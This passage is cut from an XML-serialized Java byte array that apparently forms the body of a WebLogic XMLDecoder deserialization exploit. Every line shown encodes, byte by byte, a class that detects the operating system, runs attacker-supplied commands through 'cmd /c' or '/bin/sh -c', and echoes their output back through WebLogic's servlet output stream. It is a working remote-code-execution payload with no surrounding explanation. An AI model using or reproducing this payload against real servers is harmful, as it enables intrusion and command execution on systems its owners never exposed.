index=\"2118\"><byte>101</byte></void><void index=\"2119\"><byte>114</byte></void><void index=\"2120\"><byte>118</byte></void><void index=\"2121\"><byte>108</byte></void><void index=\"2122\"><byte>101</byte></void><void index=\"2123\"><byte>116</byte></void><void index=\"2124\"><byte>79</byte></void><void index=\"2125\"><byte>117</byte></void><void index=\"2126\"><byte>116</byte></void><void index=\"2127\"><byte>112</byte></void><void index=\"2128\"><byte>117</byte></void><void index=\"2129\"><byte>116</byte></void><void index=\"2130\"><byte>83</byte></void><void index=\"2131\"><byte>116</byte></void><void index=\"2132\"><byte>114</byte></void><void index=\"2133\"><byte>101</byte></void><void index=\"2134\"><byte>97</byte></void><void index=\"2135\"><byte>109</byte></void><void index=\"2136\"><byte>1</byte></void><void index=\"2137\"><byte>0</byte></void><void index=\"2138\"><byte>53</byte></void><void index=\"2139\"><byte>40</byte></void><void index=\"2140\"><byte>41</byte></void><void index=\"2141\"><byte>76</byte></void><void index=\"2142\"><byte>119</byte></void><void index=\"2143\"><byte>101</byte></void><void index=\"2144\"><byte>98</byte></void><void index=\"2145\"><byte>108</byte></void><void index=\"2146\"><byte>111</byte></void><void index=\"2147\"><byte>103</byte></void><void index=\"2148\"><byte>105</byte></void><void index=\"2149\"><byte>99</byte></void><void index=\"2150\"><byte>47</byte></void><void index=\"2151\"><byte>115</byte></void><void index=\"2152\"><byte>101</byte></void><void index=\"2153\"><byte>114</byte></void><void index=\"2154\"><byte>118</byte></void><void index=\"2155\"><byte>108</byte></void><void index=\"2156\"><byte>101</byte></void><void index=\"2157\"><byte>116</byte></void><void index=\"2158\"><byte>47</byte></void><void index=\"2159\"><byte>105</byte></void><void index=\"2160\"><byte>110</byte></void><void index=\"2161\"><byte>116</byte></void><void index=\"2162\"><byte>101</byte></void><void index=\"2163\"><byte>114</byte></void><void index=\"2164\"><byte>110</byte></void><void index=\"2165\"><byte>97</byte></void><void index=\"2166\"><byte>108</byte></void><void index=\"2167\"><byte>47</byte></void><void index=\"2168\"><byte>83</byte></void><void index=\"2169\"><byte>101</byte></void><void index=\"2170\"><byte>114</byte></void><void index=\"2171\"><byte>118</byte></void><void index=\"2172\"><byte>108</byte></void><void index=\"2173\"><byte>101</byte></void><void index=\"2174\"><byte>116</byte></void><void index=\"2175\"><byte>79</byte></void><void index=\"2176\"><byte>117</byte></void><void index=\"2177\"><byte>116</byte></void><void index=\"2178\"><byte>112</byte></void><void index=\"2179\"><byte>117</byte></void><void index=\"2180\"><byte>116</byte></void><void index=\"2181\"><byte>83</byte></void><void index=\"2182\"><byte>116</byte></void><void index=\"2183\"><byte>114</byte></void><void index=\"2184\"><byte>101</byte></void><void index=\"2185\"><byte>97</byte></void><void index=\"2186\"><byte>109</byte></void><void index=\"2187\"><byte>73</byte></void><void index=\"2188\"><byte>109</byte></void><void index=\"2189\"><byte>112</byte></void><void index=\"2190\"><byte>108</byte></void><void index=\"2191\"><byte>59</byte></void><void index=\"2192\"><byte>12</byte></void><void index=\"2193\"><byte>0</byte></void><void index=\"2194\"><byte>74</byte></void><void index=\"2195\"><byte>0</byte></void><void index=\"2196\"><byte>75</byte></void><void index=\"2197\"><byte>10</byte></void><void index=\"2198\"><byte>0</byte></void><void index=\"2199\"><byte>69</byte></void><void index=\"2200\"><byte>0</byte></void><void index=\"2201\"><byte>76</byte></void><void index=\"2202\"><byte>1</byte></void><void index=\"2203\"><byte>0</byte></void><void index=\"2204\"><byte>35</byte></void><void index=\"2205\"><byte>119</byte></void><void index=\"2206\"><byte>101</byte></void><void index=\"2207\"><byte>98</byte></void><void index=\"2208\"><byte>108</byte></void><void index=\"2209\"><byte>111</byte></void><void index=\"2210\"><byte>103</byte></void><void index=\"2211\"><byte>105</byte></void><void index=\"2212\"><byte>99</byte></void><void index=\"2213\"><byte>47</byte></void><void index=\"2214\"><byte>120</byte></void><void index=\"2215\"><byte>109</byte></void><void index=\"2216\"><byte>108</byte></void><void index=\"2217\"><byte>47</byte></void><void index=\"2218\"><byte>117</byte></void><void index=\"2219\"><byte>116</byte></void><void index=\"2220\"><byte>105</byte></void><void index=\"2221\"><byte>108</byte></void><void index=\"2222\"><byte>47</byte></void><void index=\"2223\"><byte>83</byte></void><void index=\"2224\"><byte>116</byte></void><void index=\"2225\"><byte>114</byte></void><void index=\"2226\"><byte>105</byte></void><void index=\"2227\"><byte>110</byte></void><void index=\"2228\"><byte>103</byte></void><void index=\"2229\"><byte>73</byte></void><void index=\"2230\"><byte>110</byte></void><void index=\"2231\"><byte>112</byte></void><void index=\"2232\"><byte>117</byte></void><void index=\"2233\"><byte>116</byte></void><void index=\"2234\"><byte>83</byte></void><void index=\"2235\"><byte>116</byte></void><void index=\"2236\"><byte>114</byte></void><void index=\"2237\"><byte>101</byte></void><void index=\"2238\"><byte>97</byte></void><void index=\"2239\"><byte>109</byte></void><void index=\"2240\"><byte>7</byte></void><void index=\"2241\"><byte>0</byte></void><void index=\"2242\"><byte>78</byte></void><void index=\"2243\"><byte>1</byte></void><void index=\"2244\"><byte>0</byte></void><void index=\"2245\"><byte>22</byte></void><void index=\"2246\"><byte>106</byte></void><void index=\"2247\"><byte>97</byte></void><void index=\"2248\"><byte>118</byte></void><void index=\"2249\"><byte>97</byte></void><void index=\"2250\"><byte>47</byte></void><void index=\"2251\"><byte>108</byte></void><void index=\"2252\"><byte>97</byte></void><void index=\"2253\"><byte>110</byte></void><void index=\"2254\"><byte>103</byte></void><void index=\"2255\"><byte>47</byte></void><void index=\"2256\"><byte>83</byte></void><void index=\"2257\"><byte>116</byte></void><void index=\"2258\"><byte>114</byte></void><void index=\"2259\"><byte>105</byte></void><void index=\"2260\"><byte>110</byte></void><void index=\"2261\"><byte>103</byte></void><void index=\"2262\"><byte>66</byte></void><void index=\"2263\"><byte>117</byte></void><void index=\"2264\"><byte>102</byte></void><void index=\"2265\"><byte>102</byte></void><void index=\"2266\"><byte>101</byte></void><void index=\"2267\"><byte>114</byte></void><void index=\"2268\"><byte>7</byte></void><void index=\"2269\"><byte>0</byte></void><void index=\"2270\"><byte>80</byte></void><void index=\"2271\"><byte>10</byte></void><void index=\"2272\"><byte>0</byte></void><void index=\"2273\"><byte>81</byte></void><void index=\"2274\"><byte>0</byte></void><void index=\"2275\"><byte>34</byte></void><void index=\"2276\"><byte>1</byte></void><void index=\"2277\"><byte>0</byte></void><void index=\"2278\"><byte>6</byte></void><void index=\"2279\"><byte>97</byte></void><void index=\"2280\"><byte>112</byte></void><void index=\"2281\"><byte>112</byte></void><void index=\"2282\"><byte>101</byte></void><void index=\"2283\"><byte>110</byte></void><void index=\"2284\"><byte>100</byte></void><void index=\"2285\"><byte>1</byte></void><void index=\"2286\"><byte>0</byte></void><void index=\"2287\"><byte>44</byte></void><void index=\"2288\"><byte>40</byte></void><void index=\"2289\"><byte>76</byte></void><void index=\"2290\"><byte>106</byte></void><void index=\"2291\"><byte>97</byte></void><void index=\"2292\"><byte>118</byte></void><void index=\"2293\"><byte>97</byte></void><void index=\"2294\"><byte>47</byte></void><void index=\"2295\"><byte>108</byte></void><void index=\"2296\"><byte>97</byte></void><void index=\"2297\"><byte>110</byte></void><void index=\"2298\"><byte>103</byte></void><void index=\"2299\"><byte>47</byte></void><void index=\"2300\"><byte>83</byte></void><void index=\"2301\"><byte>116</byte></void><void index=\"2302\"><byte>114</byte></void><void index=\"2303\"><byte>105</byte></void><void index=\"2304\"><byte>110</byte></void><void index=\"2305\"><byte>103</byte></void><void index=\"2306\"><byte>59</byte></void><void index=\"2307\"><byte>41</byte></void><void index=\"2308\"><byte>76</byte></void><void index=\"2309\"><byte>106</byte></void><void index=\"2310\"><byte>97</byte></void><void index=\"2311\"><byte>118</byte></void><void index=\"2312\"><byte>97</byte></void><void index=\"2313\"><byte>47</byte></void><void index=\"2314\"><byte>108</byte></void><void index=\"2315\"><byte>97</byte></void><void index=\"2316\"><byte>110</byte></void><void index=\"2317\"><byte>103</byte></void><void index=\"2318\"><byte>47</byte></void><void index=\"2319\"><byte>83</byte></void><void index=\"2320\"><byte>116</byte></void><void index=\"2321\"><byte>114</byte></void><void index=\"2322\"><byte>105</byte></void><void index=\"2323\"><byte>110</byte></void><void index=\"2324\"><byte>103</byte></void><void index=\"2325\"><byte>66</byte></void><void index=\"2326\"><byte>117</byte></void><void index=\"2327\"><byte>102</byte></void><void index=\"2328\"><byte>102</byte></void><void index=\"2329\"><byte>101</byte></void><void index=\"2330\"><byte>114</byte></void><void index=\"2331\"><byte>59</byte></void><void index=\"2332\"><byte>12</byte></void><void index=\"2333\"><byte>0</byte></void><void index=\"2334\"><byte>83</byte></void><void index=\"2335\"><byte>0</byte></void><void index=\"2336\"><byte>84</byte></void><void index=\"2337\"><byte>10</byte></void><void index=\"2338\"><byte>0</byte></void><void index=\"2339\"><byte>81</byte></void><void index=\"2340\"><byte>0</byte></void><void index=\"2341\"><byte>85</byte></void><void index=\"2342\"><byte>1</byte></void><void index=\"2343\"><byte>0</byte></void><void index=\"2344\"><byte>5</byte></void><void index=\"2345\"><byte>32</byte></void><void index=\"2346\"><byte>58</byte></void><void index=\"2347\"><byte>32</byte></void><void index=\"2348\"><byte>13</byte></void><void index=\"2349\"><byte>10</byte></void><void index=\"2350\"><byte>8</byte></void><void index=\"2351\"><byte>0</byte></void><void index=\"2352\"><byte>87</byte></void><void index=\"2353\"><byte>1</byte></void><void index=\"2354\"><byte>0</byte></void><void index=\"2355\"><byte>8</byte></void><void index=\"2356\"><byte>116</byte></void><void index=\"2357\"><byte>111</byte></void><void index=\"2358\"><byte>83</byte></void><void index=\"2359\"><byte>116</byte></void><void index=\"2360\"><byte>114</byte></void><void index=\"2361\"><byte>105</byte></void><void index=\"2362\"><byte>110</byte></void><void index=\"2363\"><byte>103</byte></void><void index=\"2364\"><byte>1</byte></void><void index=\"2365\"><byte>0</byte></void><void index=\"2366\"><byte>20</byte></void><void index=\"2367\"><byte>40</byte></void><void index=\"2368\"><byte>41</byte></void><void index=\"2369\"><byte>76</byte></void><void index=\"2370\"><byte>106</byte></void><void index=\"2371\"><byte>97</byte></void><void index=\"2372\"><byte>118</byte></void><void index=\"2373\"><byte>97</byte></void><void index=\"2374\"><byte>47</byte></void><void index=\"2375\"><byte>108</byte></void><void index=\"2376\"><byte>97</byte></void><void index=\"2377\"><byte>110</byte></void><void index=\"2378\"><byte>103</byte></void><void index=\"2379\"><byte>47</byte></void><void index=\"2380\"><byte>83</byte></void><void index=\"2381\"><byte>116</byte></void><void index=\"2382\"><byte>114</byte></void><void index=\"2383\"><byte>105</byte></void><void index=\"2384\"><byte>110</byte></void><void index=\"2385\"><byte>103</byte></void><void index=\"2386\"><byte>59</byte></void><void index=\"2387\"><byte>12</byte></void><void index=\"2388\"><byte>0</byte></void><void index=\"2389\"><byte>89</byte></void><void index=\"2390\"><byte>0</byte></void><void index=\"2391\"><byte>90</byte></void><void index=\"2392\"><byte>10</byte></void><void index=\"2393\"><byte>0</byte></void><void index=\"2394\"><byte>81</byte></void><void index=\"2395\"><byte>0</byte></void><void index=\"2396\"><byte>91</byte></void><void index=\"2397\"><byte>12</byte></void><void index=\"2398\"><byte>0</byte></void><void index=\"2399\"><byte>10</byte></void><void index=\"2400\"><byte>0</byte></void><void index=\"2401\"><byte>71</byte></void><void index=\"2402\"><byte>10</byte></void><void index=\"2403\"><byte>0</byte></void><void index=\"2404\"><byte>79</byte></void><void index=\"2405\"><byte>0</byte></void><void index=\"2406\"><byte>93</byte></void><void index=\"2407\"><byte>1</byte></void><void index=\"2408\"><byte>0</byte></void><void index=\"2409\"><byte>49</byte></void><void index=\"2410\"><byte>119</byte></void><void index=\"2411\"><byte>101</byte></void><void index=\"2412\"><byte>98</byte></void><void index=\"2413\"><byte>108</byte></void><void index=\"2414\"><byte>111</byte></void><void index=\"2415\"><byte>103</byte></void><void index=\"2416\"><byte>105</byte></void><void index=\"2417\"><byte>99</byte></void><void index=\"2418\"><byte>47</byte></void><void index=\"2419\"><byte>115</byte></void><void index=\"2420\"><byte>101</byte></void><void index=\"2421\"><byte>114</byte></void><void index=\"2422\"><byte>118</byte></void><void index=\"2423\"><byte>108</byte></void><void index=\"2424\"><byte>101</byte></void><void index=\"2425\"><byte>116</byte></void><void index=\"2426\"><byte>47</byte></void><void index=\"2427\"><byte>105</byte></void><void index=\"2428\"><byte>110</byte></void><void index=\"2429\"><byte>116</byte></void><void index=\"2430\"><byte>101</byte></void><void index=\"2431\"><byte>114</byte></void><void index=\"2432\"><byte>110</byte></void><void index=\"2433\"><byte>97</byte></void><void index=\"2434\"><byte>108</byte></void><void index=\"2435\"><byte>47</byte></void><void index=\"2436\"><byte>83</byte></void><void index=\"2437\"><byte>101</byte></void><void index=\"2438\"><byte>114</byte></void><void index=\"2439\"><byte>118</byte></void><void index=\"2440\"><byte>108</byte></void><void index=\"2441\"><byte>101</byte></void><void index=\"2442\"><byte>116</byte></void><void index=\"2443\"><byte>79</byte></void><void index=\"2444\"><byte>117</byte></void><void index=\"2445\"><byte>116</byte></void><void index=\"2446\"><byte>112</byte></void><void index=\"2447\"><byte>117</byte></void><void index=\"2448\"><byte>116</byte></void><void index=\"2449\"><byte>83</byte></void><void index=\"2450\"><byte>116</byte></void><void index=\"2451\"><byte>114</byte></void><void index=\"2452\"><byte>101</byte></void><void index=\"2453\"><byte>97</byte></void><void index=\"2454\"><byte>109</byte></void><void index=\"2455\"><byte>73</byte></void><void index=\"2456\"><byte>109</byte></void><void index=\"2457\"><byte>112</byte></void><void index=\"2458\"><byte>108</byte></void><void index=\"2459\"><byte>7</byte></void><void index=\"2460\"><byte>0</byte></void><void index=\"2461\"><byte>95</byte></void><void index=\"2462\"><byte>1</byte></void><void index=\"2463\"><byte>0</byte></void><void index=\"2464\"><byte>11</byte></void><void index=\"2465\"><byte>119</byte></void><void index=\"2466\"><byte>114</byte></void><void index=\"2467\"><byte>105</byte></void><void index=\"2468\"><byte>116</byte></void><void index=\"2469\"><byte>101</byte></void><void index=\"2470\"><byte>83</byte></void><void index=\"2471\"><byte>116</byte></void><void index=\"2472\"><byte>114</byte></void><void index=\"2473\"><byte>101</byte></void><void index=\"2474\"><byte>97</byte></void><void index=\"2475\"><byte>109</byte></void><void index=\"2476\"><byte>1</byte></void><void index=\"2477\"><byte>0</byte></void><void index=\"2478\"><byte>24</byte></void><void index=\"2479\"><byte>40</byte></void><void index=\"2480\"><byte>76</byte></void><void index=\"2481\"><byte>106</byte></void><void index=\"2482\"><byte>97</byte></void><void index=\"2483\"><byte>118</byte></void><void index=\"2484\"><byte>97</byte></void><void index=\"2485\"><byte>47</byte></void><void index=\"2486\"><byte>105</byte></void><void index=\"2487\"><byte>111</byte></void><void index=\"2488\"><byte>47</byte></void><void index=\"2489\"><byte>73</byte></void><void index=\"2490\"><byte>110</byte></void><void index=\"2491\"><byte>112</byte></void><void index=\"2492\"><byte>117</byte></void><void index=\"2493\"><byte>116</byte></void><void index=\"2494\"><byte>83</byte></void><void index=\"2495\"><byte>116</byte></void><void index=\"2496\"><byte>114</byte></void><void index=\"2497\"><byte>101</byte></void><void index=\"2498\"><byte>97</byte></void><void index=\"2499\"><byte>109</byte></void><void index=\"2500\"><byte>59</byte></void><void index=\"2501\"><byte>41</byte></void><void index=\"2502\"><byte>86</byte></void><void index=\"2503\"><byte>12</byte></void><void index=\"2504\"><byte>0</byte></void><void index=\"2505\"><byte>97</byte></void><void index=\"2506\"><byte>0</byte></void><void index=\"2507\"><byte>98</byte></void><void index=\"2508\"><byte>10</byte></void><void index=\"2509\"><byte>0</byte></void><void index=\"2510\"><byte>96</byte></void><void index=\"2511\"><byte>0</byte></void><void index=\"2512\"><byte>99</byte></void><void index=\"2513\"><byte>1</byte></void><void index=\"2514\"><byte>0</byte></void><void index=\"2515\"><byte>5</byte></void><void index=\"2516\"><byte>102</byte></void><void index=\"2517\"><byte>108</byte></void><void index=\"2518\"><byte>117</byte></void><void index=\"2519\"><byte>115</byte></void><void index=\"2520\"><byte>104</byte></void><void index=\"2521\"><byte>12</byte></void><void index=\"2522\"><byte>0</byte></void><void index=\"2523\"><byte>101</byte></void><void index=\"2524\"><byte>0</byte></void><void index=\"2525\"><byte>11</byte></void><void index=\"2526\"><byte>10</byte></void><void index=\"2527\"><byte>0</byte></void><void index=\"2528\"><byte>96</byte></void><void index=\"2529\"><byte>0</byte></void><void index=\"2530\"><byte>102</byte></void><void index=\"2531\"><byte>1</byte></void><void index=\"2532\"><byte>0</byte></void><void index=\"2533\"><byte>7</byte></void><void index=\"2534\"><byte>111</byte></void><void index=\"2535\"><byte>115</byte></void><void index=\"2536\"><byte>46</byte></void><void index=\"2537\"><byte>110</byte></void><void index=\"2538\"><byte>97</byte></void><void index=\"2539\"><byte>109</byte></void><void index=\"2540\"><byte>101</byte></void><void index=\"2541\"><byte>8</byte></void><void index=\"2542\"><byte>0</byte></void><void index=\"2543\"><byte>104</byte></void><void index=\"2544\"><byte>1</byte></void><void index=\"2545\"><byte>0</byte></void><void index=\"2546\"><byte>16</byte></void><void index=\"2547\"><byte>106</byte></void><void index=\"2548\"><byte>97</byte></void><void index=\"2549\"><byte>118</byte></void><void index=\"2550\"><byte>97</byte></void><void index=\"2551\"><byte>47</byte></void><void index=\"2552\"><byte>108</byte></void><void index=\"2553\"><byte>97</byte></void><void index=\"2554\"><byte>110</byte></void><void index=\"2555\"><byte>103</byte></void><void index=\"2556\"><byte>47</byte></void><void index=\"2557\"><byte>83</byte></void><void index=\"2558\"><byte>121</byte></void><void index=\"2559\"><byte>115</byte></void><void index=\"2560\"><byte>116</byte></void><void index=\"2561\"><byte>101</byte></void><void index=\"2562\"><byte>109</byte></void><void index=\"2563\"><byte>7</byte></void><void index=\"2564\"><byte>0</byte></void><void index=\"2565\"><byte>106</byte></void><void index=\"2566\"><byte>1</byte></void><void index=\"2567\"><byte>0</byte></void><void index=\"2568\"><byte>11</byte></void><void index=\"2569\"><byte>103</byte></void><void index=\"2570\"><byte>101</byte></void><void index=\"2571\"><byte>116</byte></void><void index=\"2572\"><byte>80</byte></void><void index=\"2573\"><byte>114</byte></void><void index=\"2574\"><byte>111</byte></void><void index=\"2575\"><byte>112</byte></void><void index=\"2576\"><byte>101</byte></void><void index=\"2577\"><byte>114</byte></void><void index=\"2578\"><byte>116</byte></void><void index=\"2579\"><byte>121</byte></void><void index=\"2580\"><byte>12</byte></void><void index=\"2581\"><byte>0</byte></void><void index=\"2582\"><byte>108</byte></void><void index=\"2583\"><byte>0</byte></void><void index=\"2584\"><byte>59</byte></void><void index=\"2585\"><byte>10</byte></void><void index=\"2586\"><byte>0</byte></void><void index=\"2587\"><byte>107</byte></void><void index=\"2588\"><byte>0</byte></void><void index=\"2589\"><byte>109</byte></void><void index=\"2590\"><byte>1</byte></void><void index=\"2591\"><byte>0</byte></void><void index=\"2592\"><byte>16</byte></void><void index=\"2593\"><byte>106</byte></void><void index=\"2594\"><byte>97</byte></void><void index=\"2595\"><byte>118</byte></void><void index=\"2596\"><byte>97</byte></void><void index=\"2597\"><byte>47</byte></void><void index=\"2598\"><byte>108</byte></void><void index=\"2599\"><byte>97</byte></void><void index=\"2600\"><byte>110</byte></void><void index=\"2601\"><byte>103</byte></void><void index=\"2602\"><byte>47</byte></void><void index=\"2603\"><byte>83</byte></void><void index=\"2604\"><byte>116</byte></void><void index=\"2605\"><byte>114</byte></void><void index=\"2606\"><byte>105</byte></void><void index=\"2607\"><byte>110</byte></void><void index=\"2608\"><byte>103</byte></void><void index=\"2609\"><byte>7</byte></void><void index=\"2610\"><byte>0</byte></void><void index=\"2611\"><byte>111</byte></void><void index=\"2612\"><byte>1</byte></void><void index=\"2613\"><byte>0</byte></void><void index=\"2614\"><byte>11</byte></void><void index=\"2615\"><byte>116</byte></void><void index=\"2616\"><byte>111</byte></void><void index=\"2617\"><byte>76</byte></void><void index=\"2618\"><byte>111</byte></void><void index=\"2619\"><byte>119</byte></void><void index=\"2620\"><byte>101</byte></void><void index=\"2621\"><byte>114</byte></void><void index=\"2622\"><byte>67</byte></void><void index=\"2623\"><byte>97</byte></void><void index=\"2624\"><byte>115</byte></void><void index=\"2625\"><byte>101</byte></void><void index=\"2626\"><byte>12</byte></void><void index=\"2627\"><byte>0</byte></void><void index=\"2628\"><byte>113</byte></void><void index=\"2629\"><byte>0</byte></void><void index=\"2630\"><byte>90</byte></void><void index=\"2631\"><byte>10</byte></void><void index=\"2632\"><byte>0</byte></void><void index=\"2633\"><byte>112</byte></void><void index=\"2634\"><byte>0</byte></void><void index=\"2635\"><byte>114</byte></void><void index=\"2636\"><byte>1</byte></void><void index=\"2637\"><byte>0</byte></void><void index=\"2638\"><byte>3</byte></void><void index=\"2639\"><byte>119</byte></void><void index=\"2640\"><byte>105</byte></void><void index=\"2641\"><byte>110</byte></void><void index=\"2642\"><byte>8</byte></void><void index=\"2643\"><byte>0</byte></void><void index=\"2644\"><byte>116</byte></void><void index=\"2645\"><byte>1</byte></void><void index=\"2646\"><byte>0</byte></void><void index=\"2647\"><byte>8</byte></void><void index=\"2648\"><byte>99</byte></void><void index=\"2649\"><byte>111</byte></void><void index=\"2650\"><byte>110</byte></void><void index=\"2651\"><byte>116</byte></void><void index=\"2652\"><byte>97</byte></void><void index=\"2653\"><byte>105</byte></void><void index=\"2654\"><byte>110</byte></void><void index=\"2655\"><byte>115</byte></void><void index=\"2656\"><byte>1</byte></void><void index=\"2657\"><byte>0</byte></void><void index=\"2658\"><byte>27</byte></void><void index=\"2659\"><byte>40</byte></void><void index=\"2660\"><byte>76</byte></void><void index=\"2661\"><byte>106</byte></void><void index=\"2662\"><byte>97</byte></void><void index=\"2663\"><byte>118</byte></void><void index=\"2664\"><byte>97</byte></void><void index=\"2665\"><byte>47</byte></void><void index=\"2666\"><byte>108</byte></void><void index=\"2667\"><byte>97</byte></void><void index=\"2668\"><byte>110</byte></void><void index=\"2669\"><byte>103</byte></void><void index=\"2670\"><byte>47</byte></void><void index=\"2671\"><byte>67</byte></void><void index=\"2672\"><byte>104</byte></void><void index=\"2673\"><byte>97</byte></void><void index=\"2674\"><byte>114</byte></void><void index=\"2675\"><byte>83</byte></void><void index=\"2676\"><byte>101</byte></void><void index=\"2677\"><byte>113</byte></void><void index=\"2678\"><byte>117</byte></void><void index=\"2679\"><byte>101</byte></void><void index=\"2680\"><byte>110</byte></void><void index=\"2681\"><byte>99</byte></void><void index=\"2682\"><byte>101</byte></void><void index=\"2683\"><byte>59</byte></void><void index=\"2684\"><byte>41</byte></void><void index=\"2685\"><byte>90</byte></void><void index=\"2686\"><byte>12</byte></void><void index=\"2687\"><byte>0</byte></void><void index=\"2688\"><byte>118</byte></void><void index=\"2689\"><byte>0</byte></void><void index=\"2690\"><byte>119</byte></void><void index=\"2691\"><byte>10</byte></void><void index=\"2692\"><byte>0</byte></void><void index=\"2693\"><byte>112</byte></void><void index=\"2694\"><byte>0</byte></void><void index=\"2695\"><byte>120</byte></void><void index=\"2696\"><byte>1</byte></void><void index=\"2697\"><byte>0</byte></void><void index=\"2698\"><byte>17</byte></void><void index=\"2699\"><byte>106</byte></void><void index=\"2700\"><byte>97</byte></void><void index=\"2701\"><byte>118</byte></void><void index=\"2702\"><byte>97</byte></void><void index=\"2703\"><byte>47</byte></void><void index=\"2704\"><byte>108</byte></void><void index=\"2705\"><byte>97</byte></void><void index=\"2706\"><byte>110</byte></void><void index=\"2707\"><byte>103</byte></void><void index=\"2708\"><byte>47</byte></void><void index=\"2709\"><byte>82</byte></void><void index=\"2710\"><byte>117</byte></void><void index=\"2711\"><byte>110</byte></void><void index=\"2712\"><byte>116</byte></void><void index=\"2713\"><byte>105</byte></void><void index=\"2714\"><byte>109</byte></void><void index=\"2715\"><byte>101</byte></void><void index=\"2716\"><byte>7</byte></void><void index=\"2717\"><byte>0</byte></void><void index=\"2718\"><byte>122</byte></void><void index=\"2719\"><byte>1</byte></void><void index=\"2720\"><byte>0</byte></void><void index=\"2721\"><byte>10</byte></void><void index=\"2722\"><byte>103</byte></void><void index=\"2723\"><byte>101</byte></void><void index=\"2724\"><byte>116</byte></void><void index=\"2725\"><byte>82</byte></void><void index=\"2726\"><byte>117</byte></void><void index=\"2727\"><byte>110</byte></void><void index=\"2728\"><byte>116</byte></void><void index=\"2729\"><byte>105</byte></void><void index=\"2730\"><byte>109</byte></void><void index=\"2731\"><byte>101</byte></void><void index=\"2732\"><byte>1</byte></void><void index=\"2733\"><byte>0</byte></void><void index=\"2734\"><byte>21</byte></void><void index=\"2735\"><byte>40</byte></void><void index=\"2736\"><byte>41</byte></void><void index=\"2737\"><byte>76</byte></void><void index=\"2738\"><byte>106</byte></void><void index=\"2739\"><byte>97</byte></void><void index=\"2740\"><byte>118</byte></void><void index=\"2741\"><byte>97</byte></void><void index=\"2742\"><byte>47</byte></void><void index=\"2743\"><byte>108</byte></void><void index=\"2744\"><byte>97</byte></void><void index=\"2745\"><byte>110</byte></void><void index=\"2746\"><byte>103</byte></void><void index=\"2747\"><byte>47</byte></void><void index=\"2748\"><byte>82</byte></void><void index=\"2749\"><byte>117</byte></void><void index=\"2750\"><byte>110</byte></void><void index=\"2751\"><byte>116</byte></void><void index=\"2752\"><byte>105</byte></void><void index=\"2753\"><byte>109</byte></void><void index=\"2754\"><byte>101</byte></void><void index=\"2755\"><byte>59</byte></void><void index=\"2756\"><byte>12</byte></void><void index=\"2757\"><byte>0</byte></void><void index=\"2758\"><byte>124</byte></void><void index=\"2759\"><byte>0</byte></void><void index=\"2760\"><byte>125</byte></void><void index=\"2761\"><byte>10</byte></void><void index=\"2762\"><byte>0</byte></void><void index=\"2763\"><byte>123</byte></void><void index=\"2764\"><byte>0</byte></void><void index=\"2765\"><byte>126</byte></void><void index=\"2766\"><byte>1</byte></void><void index=\"2767\"><byte>0</byte></void><void index=\"2768\"><byte>7</byte></void><void index=\"2769\"><byte>99</byte></void><void index=\"2770\"><byte>109</byte></void><void index=\"2771\"><byte>100</byte></void><void index=\"2772\"><byte>32</byte></void><void index=\"2773\"><byte>47</byte></void><void index=\"2774\"><byte>99</byte></void><void index=\"2775\"><byte>32</byte></void><void index=\"2776\"><byte>8</byte></void><void index=\"2777\"><byte>0</byte></void><void index=\"2778\"><byte>-128</byte></void><void index=\"2779\"><byte>1</byte></void><void index=\"2780\"><byte>0</byte></void><void index=\"2781\"><byte>4</byte></void><void index=\"2782\"><byte>101</byte></void><void index=\"2783\"><byte>120</byte></void><void index=\"2784\"><byte>101</byte></void><void index=\"2785\"><byte>99</byte></void><void index=\"2786\"><byte>1</byte></void><void index=\"2787\"><byte>0</byte></void><void index=\"2788\"><byte>39</byte></void><void index=\"2789\"><byte>40</byte></void><void index=\"2790\"><byte>76</byte></void><void index=\"2791\"><byte>106</byte></void><void index=\"2792\"><byte>97</byte></void><void index=\"2793\"><byte>118</byte></void><void index=\"2794\"><byte>97</byte></void><void index=\"2795\"><byte>47</byte></void><void index=\"2796\"><byte>108</byte></void><void index=\"2797\"><byte>97</byte></void><void index=\"2798\"><byte>110</byte></void><void index=\"2799\"><byte>103</byte></void><void index=\"2800\"><byte>47</byte></void><void index=\"2801\"><byte>83</byte></void><void index=\"2802\"><byte>116</byte></void><void index=\"2803\"><byte>114</byte></void><void index=\"2804\"><byte>105</byte></void><void index=\"2805\"><byte>110</byte></void><void index=\"2806\"><byte>103</byte></void><void index=\"2807\"><byte>59</byte></void><void index=\"2808\"><byte>41</byte></void><void index=\"2809\"><byte>76</byte></void><void index=\"2810\"><byte>106</byte></void><void index=\"2811\"><byte>97</byte></void><void index=\"2812\"><byte>118</byte></void><void index=\"2813\"><byte>97</byte></void><void index=\"2814\"><byte>47</byte></void><void index=\"2815\"><byte>108</byte></void><void index=\"2816\"><byte>97</byte></void><void index=\"2817\"><byte>110</byte></void><void index=\"2818\"><byte>103</byte></void><void index=\"2819\"><byte>47</byte></void><void index=\"2820\"><byte>80</byte></void><void index=\"2821\"><byte>114</byte></void><void index=\"2822\"><byte>111</byte></void><void index=\"2823\"><byte>99</byte></void><void index=\"2824\"><byte>101</byte></void><void index=\"2825\"><byte>115</byte></void><void index=\"2826\"><byte>115</byte></void><void index=\"2827\"><byte>59</byte></void><void index=\"2828\"><byte>12</byte></void><void index=\"2829\"><byte>0</byte></void><void index=\"2830\"><byte>-126</byte></void><void index=\"2831\"><byte>0</byte></void><void index=\"2832\"><byte>-125</byte></void><void index=\"2833\"><byte>10</byte></void><void index=\"2834\"><byte>0</byte></void><void index=\"2835\"><byte>123</byte></void><void index=\"2836\"><byte>0</byte></void><void index=\"2837\"><byte>-124</byte></void><void index=\"2838\"><byte>1</byte></void><void index=\"2839\"><byte>0</byte></void><void index=\"2840\"><byte>11</byte></void><void index=\"2841\"><byte>47</byte></void><void index=\"2842\"><byte>98</byte></void><void index=\"2843\"><byte>105</byte></void><void index=\"2844\"><byte>110</byte></void><void index=\"2845\"><byte>47</byte></void><void index=\"2846\"><byte>115</byte></void><void index=\"2847\"><byte>104</byte></void><void index=\"2848\"><byte>32</byte></void><void index=\"2849\"><byte>45</byte></void><void index=\"2850\"><byte>99</byte></void><void index=\"2851\"><byte>32</byte></void><void index=\"2852\"><byte>8</byte></void><void index=\"2853\"><byte>0</byte></void><void index=\"2854\"><byte>-122</byte></void><void index=\"2855\"><byte>1</byte></void><void index=\"2856\"><byte>0</byte></void><void index=\"2857\"><byte>22</byte></void><void index=\"2858\"><byte>106</byte></void><void index=\"2859\"><byte>97</byte></void><void index=\"2860\"><byte>118</byte></void><void index=\"2861\"><byte>97</byte></void><void index=\"2862\"><byte>47</byte></void><void index=\"2863\"><byte>105</byte></void><void index=\"2864\"><byte>111</byte></void><void index=\"2865\"><byte>47</byte></void><void index=\"2866\"><byte>66</byte></void><void 